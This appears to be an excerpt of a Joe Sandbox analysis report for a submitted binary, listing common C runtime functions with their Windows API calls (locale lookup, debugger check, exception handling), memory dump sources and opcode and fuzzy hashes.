                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                  • API String ID: 4168288129-2761157908
                                                                                                  • Opcode ID: 7a3156e817c14c79c57f169fce75b5157253796f8c9cbfa965da82264d7770fd
                                                                                                  • Instruction ID: a361e6c47d7e4742d3cda45b4e23144ba03c5e4daba8537affdcb99ec83f4bbb
                                                                                                  • Opcode Fuzzy Hash: 7a3156e817c14c79c57f169fce75b5157253796f8c9cbfa965da82264d7770fd
                                                                                                  • Instruction Fuzzy Hash: C9D23971E082298FDB64DF28DD447EAB7B6EB44305F1442EAD40DE7241EB79AE818F41
                                                                                                  Function 0068DFFD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1574 68dffd-68e00a 1575 68e0ae-68e0c7 GetLocaleInfoW 1574->1575 1576 68e010-68e015 1574->1576 1578 68e0c9-68e0cb 1575->1578 1579 68e0cd-68e0d2 1575->1579 1576->1575 1577 68e01b-68e020 1576->1577 1580 68e022-68e028 1577->1580 1581 68e0da-68e0dd 1578->1581 1579->1581 1582 68e0d4 GetACP 1579->1582 1583 68e048-68e04a 1580->1583 1584 68e02a-68e02d 1580->1584 1582->1581 1587 68e04d-68e04f 1583->1587 1585 68e02f-68e037 1584->1585 1586 68e044-68e046 1584->1586 1585->1583 1588 68e039-68e042 1585->1588 1586->1587 1587->1575 1589 68e051-68e056 1587->1589 1588->1580 1588->1586 1590 68e058-68e05e 1589->1590 1591 68e07c-68e07e 1590->1591 1592 68e060-68e063 1590->1592 1593 68e081-68e083 1591->1593 1592->1593 1594 68e065-68e06d 1592->1594 1595 68e0a5-68e0ac call 6846ac 1593->1595 1596 68e085-68e09e GetLocaleInfoW 1593->1596 1594->1591 1597 68e06f-68e078 1594->1597 1595->1581 1596->1578 1598 68e0a0-68e0a3 1596->1598 1597->1590 1600 68e07a 1597->1600 1598->1581 1600->1593
                                                                                                  APIs
                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,0068E30F,00000002,00000000,?,?,?,0068E30F,?,00000000), ref: 0068E096
                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,0068E30F,00000002,00000000,?,?,?,0068E30F,?,00000000), ref: 0068E0BF
                                                                                                  • GetACP.KERNEL32(?,?,0068E30F,?,00000000), ref: 0068E0D4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID: ACP$OCP
                                                                                                  • API String ID: 2299586839-711371036
                                                                                                  • Opcode ID: 8769e59f86b9a43feec75163f075a1c6543d5b7a8eae178c0c9ec03f5ea12b77
                                                                                                  • Instruction ID: 0717457c598c4fb93a7c4bd5e0ef8ce27b1bc67baf1f278f760fe65f5840ce27
                                                                                                  • Opcode Fuzzy Hash: 8769e59f86b9a43feec75163f075a1c6543d5b7a8eae178c0c9ec03f5ea12b77
                                                                                                  • Instruction Fuzzy Hash: 0221C522700104EAEB34AF54C901AE773A7EF64B54B168F25E90AD7300EBB3DD92C350
                                                                                                  Function 0068E1D9 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00685BDA: GetLastError.KERNEL32(00000000,?,0068A8E5,?,?,?,00000000,0067E87F,?,?,?), ref: 00685BDE
                                                                                                    • Part of subcall function 00685BDA: SetLastError.KERNEL32(00000000,?,?,?,00000000,?,00000006,000000FF,?,?,?,00000000,0067E87F,?,?,?), ref: 00685C80
                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0068E2E1
                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 0068E31F
                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 0068E332
                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0068E37A
                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0068E395
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                  • String ID:
                                                                                                  • API String ID: 415426439-0
                                                                                                  • Opcode ID: e4f1c71752c41c8b6aa18f9db6cdb6324fc0fa5080e9000dd9371465f7faf389
                                                                                                  • Instruction ID: e0b42b1bef6cd3910375cd0160463798c974a40b7082d0135265ef740c92ccca
                                                                                                  • Opcode Fuzzy Hash: e4f1c71752c41c8b6aa18f9db6cdb6324fc0fa5080e9000dd9371465f7faf389
                                                                                                  • Instruction Fuzzy Hash: E9517D71A00616AFEF10EFA4CC41EBE73BEAF49700F154669E911E7290EB719A04CB64
                                                                                                  Function 0068D864 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 254COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00685BDA: GetLastError.KERNEL32(00000000,?,0068A8E5,?,?,?,00000000,0067E87F,?,?,?), ref: 00685BDE
                                                                                                    • Part of subcall function 00685BDA: SetLastError.KERNEL32(00000000,?,?,?,00000000,?,00000006,000000FF,?,?,?,00000000,0067E87F,?,?,?), ref: 00685C80
                                                                                                  • GetACP.KERNEL32(?,?,?,?,?,?,00682B6E,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0068D923
                                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00682B6E,?,?,?,00000055,?,-00000050,?,?), ref: 0068D95A
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0068DABD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                  • String ID: utf8
                                                                                                  • API String ID: 607553120-905460609
                                                                                                  • Opcode ID: 51c624c439903c0e28d3c4d4fcfb665a67a52413df49f9415e5c9273b60bf9cc
                                                                                                  • Instruction ID: 9181b18137176d738834ab3916822e5a7c8c9604a4fd74cb6f9a30e975e44038
                                                                                                  • Opcode Fuzzy Hash: 51c624c439903c0e28d3c4d4fcfb665a67a52413df49f9415e5c9273b60bf9cc
                                                                                                  • Instruction Fuzzy Hash: 3B710331604606AADB28BF70CC46BBA73AEEF05740F24062EFA15D76C1FA71E9418774
                                                                                                  Function 00680DB0 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a9c199121d9e3474fb6156e4f8e24e37c8a4db140f7fc1b933766be7d657af46
                                                                                                  • Instruction ID: 813ed8481f7cd306f8f89541a27beaa3ad2c5dc9b3d37e519d42d22f58b0fc21
                                                                                                  • Opcode Fuzzy Hash: a9c199121d9e3474fb6156e4f8e24e37c8a4db140f7fc1b933766be7d657af46
                                                                                                  • Instruction Fuzzy Hash: 90024D71E002199BDF14DFA9C8806EEFBB6FF49314F148269D919EB340D731AA46CB90
                                                                                                  Function 00678E10 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00678E1C
                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00678EE8
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00678F01
                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00678F0B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                  • String ID:
                                                                                                  • API String ID: 254469556-0
                                                                                                  • Opcode ID: 988ff873ab7f6daebe2da0c4413994242ef2c82a9797d76c46b486e2059d7434
                                                                                                  • Instruction ID: 39a7e1aca34dfc9e12c48ae6b936514e1c2b7278b51c1d9441c99574fd5b5226
                                                                                                  • Opcode Fuzzy Hash: 988ff873ab7f6daebe2da0c4413994242ef2c82a9797d76c46b486e2059d7434
                                                                                                  • Instruction Fuzzy Hash: A4312875D05218DBDF20EFA4DD49BCDBBB9AF08300F1081AAE50DAB250EB759A85CF44
                                                                                                  Function 0068DC81 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00685BDA: GetLastError.KERNEL32(00000000,?,0068A8E5,?,?,?,00000000,0067E87F,?,?,?), ref: 00685BDE
                                                                                                    • Part of subcall function 00685BDA: SetLastError.KERNEL32(00000000,?,?,?,00000000,?,00000006,000000FF,?,?,?,00000000,0067E87F,?,?,?), ref: 00685C80
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0068DCD5
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0068DD1F
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0068DDE5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale$ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 661929714-0
                                                                                                  • Opcode ID: 8b874fbd9061f90cb7bdacb21f4a1807544180ba67141118478716a616ffef42
                                                                                                  • Instruction ID: 2c114400565beadc535bb61c41d0c6e66967b8c94d92f41e90aa4f78011edd50
                                                                                                  • Opcode Fuzzy Hash: 8b874fbd9061f90cb7bdacb21f4a1807544180ba67141118478716a616ffef42
                                                                                                  • Instruction Fuzzy Hash: C96193715402079FDF68AF24CC86BBA77AAEF14710F10427AED05DA6C5E734E991CB60
                                                                                                  Function 0067E9F7 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0067EAEF
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0067EAF9
                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0067EB06
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                  • String ID:
                                                                                                  • API String ID: 3906539128-0
                                                                                                  • Opcode ID: 541e251e972dd9d304ff4f4784fa7d7f18d89f46e98ada1e827e24b3399746eb
                                                                                                  • Instruction ID: b4d2028014b41ea4513979a8421ec8b17bcb1a04ba18a766581ae13a9009e894
                                                                                                  • Opcode Fuzzy Hash: 541e251e972dd9d304ff4f4784fa7d7f18d89f46e98ada1e827e24b3399746eb
                                                                                                  • Instruction Fuzzy Hash: 0431D474901218ABCB61DF68D989BCCBBB9BF18310F5081EAE40CA7251EB349F85CF54
                                                                                                  Function 00673230 Relevance: 3.0, Strings: 2, Instructions: 465COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: %$+
                                                                                                  • API String ID: 0-2626897407
                                                                                                  • Opcode ID: 0e6dc3d1394d0baf10ddf7531674b12d844b1198008bac88c0e763708f8850fe
                                                                                                  • Instruction ID: d19cf79fdfe32255738bd21a10153e82eaf091dfcb6f62fb89c954e8e5762f08
                                                                                                  • Opcode Fuzzy Hash: 0e6dc3d1394d0baf10ddf7531674b12d844b1198008bac88c0e763708f8850fe
                                                                                                  • Instruction Fuzzy Hash: 3402E272D10529DFCB15DF68DC41AEEBBB6FF48300F148229F819AB341E734AA059B95
                                                                                                  Function 0068645C Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000000), ref: 00686689
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionRaise
                                                                                                  • String ID:
                                                                                                  • API String ID: 3997070919-0
                                                                                                  • Opcode ID: e70d59f570623c4686b48cbdaacf5b008cc4a0e02a3d1fa83098926b7c1ce2ff
                                                                                                  • Instruction ID: 389f73adc52c9eb8c3173b029a3732c857e1a82623d1c3351b30165b775dcd60
                                                                                                  • Opcode Fuzzy Hash: e70d59f570623c4686b48cbdaacf5b008cc4a0e02a3d1fa83098926b7c1ce2ff
                                                                                                  • Instruction Fuzzy Hash: 3DB15B311106088FD715DF28C58ABA57BE2FF05364F298658F89ACF3A1C735E992CB41
                                                                                                  Function 0067888C Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 006788A2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                  • String ID:
                                                                                                  • API String ID: 2325560087-0
                                                                                                  • Opcode ID: c0bd96e31032c55232a433bc24d62dc77c52dd8bce6731836e973224afd48b83
                                                                                                  • Instruction ID: af5a9caf8f52bdf7b08be90e2169fb12202fc42cb7bd1d99bdd97de986b27e71
                                                                                                  • Opcode Fuzzy Hash: c0bd96e31032c55232a433bc24d62dc77c52dd8bce6731836e973224afd48b83
                                                                                                  • Instruction Fuzzy Hash: BE516BB1A003059FEB24CFA9D8897AAB7F6FB44310F14942AC419EB350DB75AD80CF51
                                                                                                  Function 0068B063 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 91f8a9e947161ade1cfe83324a169f259a0d76c7f4440b2cc311571e73bc2526
                                                                                                  • Instruction ID: 901cce5c50a132d2a84b72b89ceaf35b49da11b16cf3b6ae5b6a7c6ea671cfdc
                                                                                                  • Opcode Fuzzy Hash: 91f8a9e947161ade1cfe83324a169f259a0d76c7f4440b2cc311571e73bc2526
                                                                                                  • Instruction Fuzzy Hash: 1241A3B580421DAFDF20EF69CC99AEABBBAAF45300F1442DDE459D3211DB349E858F10
                                                                                                  Function 0068DED4 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00685BDA: GetLastError.KERNEL32(00000000,?,0068A8E5,?,?,?,00000000,0067E87F,?,?,?), ref: 00685BDE
                                                                                                    • Part of subcall function 00685BDA: SetLastError.KERNEL32(00000000,?,?,?,00000000,?,00000006,000000FF,?,?,?,00000000,0067E87F,?,?,?), ref: 00685C80
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0068DF28
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                  • String ID:
                                                                                                  • API String ID: 3736152602-0
                                                                                                  • Opcode ID: d9b7761523f989d13a91636fd25edb6d2c23eea3745c3f7f844e6e82561205ce
                                                                                                  • Instruction ID: 28d7e2178ab018db6ebd58840570bc05d5e092678e5a10a8568466a320cd7a87
                                                                                                  • Opcode Fuzzy Hash: d9b7761523f989d13a91636fd25edb6d2c23eea3745c3f7f844e6e82561205ce
                                                                                                  • Instruction Fuzzy Hash: 4121B372550206AFDB28BF15DC42EBA77AAEF44310B10427EFE02D6281EB35DD41DB65
                                                                                                  Function 0068DB5B Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00685BDA: GetLastError.KERNEL32(00000000,?,0068A8E5,?,?,?,00000000,0067E87F,?,?,?), ref: 00685BDE
                                                                                                    • Part of subcall function 00685BDA: SetLastError.KERNEL32(00000000,?,?,?,00000000,?,00000006,000000FF,?,?,?,00000000,0067E87F,?,?,?), ref: 00685C80
                                                                                                  • EnumSystemLocalesW.KERNEL32(0068DC81,00000001,00000000,?,-00000050,?,0068E2B5,00000000,?,?,?,00000055,?), ref: 0068DBCD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 2417226690-0
                                                                                                  • Opcode ID: 91bb1bda8c29e23f94e1f4a970260ce9beed1ac9cb0e9680a0050bdd5db7c831
                                                                                                  • Instruction ID: b9f28c129818b2076d72e2f05c3719c151f9c75d4c376069880a2caf6e1a185c
                                                                                                  • Opcode Fuzzy Hash: 91bb1bda8c29e23f94e1f4a970260ce9beed1ac9cb0e9680a0050bdd5db7c831
                                                                                                  • Instruction Fuzzy Hash: 1C11257A2007015FDB18AF39C8A19BAB7A2FF80368B15452CE94787B80E771B903C750
                                                                                                  Function 0068E103 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00685BDA: GetLastError.KERNEL32(00000000,?,0068A8E5,?,?,?,00000000,0067E87F,?,?,?), ref: 00685BDE
                                                                                                    • Part of subcall function 00685BDA: SetLastError.KERNEL32(00000000,?,?,?,00000000,?,00000006,000000FF,?,?,?,00000000,0067E87F,?,?,?), ref: 00685C80
                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0068DE9D,00000000,00000000,?), ref: 0068E12F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                  • String ID:
                                                                                                  • API String ID: 3736152602-0
                                                                                                  • Opcode ID: ef83cdeabc684c805a1d3f74e84be2e35d28f5f753b437cdbaf431311b109fd4
                                                                                                  • Instruction ID: 6c82a0bfb3a8d9656856e73111e94fd8b6abe94456ac1f49e4070d51dff3f731
                                                                                                  • Opcode Fuzzy Hash: ef83cdeabc684c805a1d3f74e84be2e35d28f5f753b437cdbaf431311b109fd4
                                                                                                  • Instruction Fuzzy Hash: FD01FE326001126BDB187B64CC49AFB376AEF40B54F154629ED57A3280EA75FE42C790
                                                                                                  Function 0068DBF6 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00685BDA: GetLastError.KERNEL32(00000000,?,0068A8E5,?,?,?,00000000,0067E87F,?,?,?), ref: 00685BDE
                                                                                                    • Part of subcall function 00685BDA: SetLastError.KERNEL32(00000000,?,?,?,00000000,?,00000006,000000FF,?,?,?,00000000,0067E87F,?,?,?), ref: 00685C80
                                                                                                  • EnumSystemLocalesW.KERNEL32(0068DED4,00000001,?,?,-00000050,?,0068E27D,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0068DC40
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
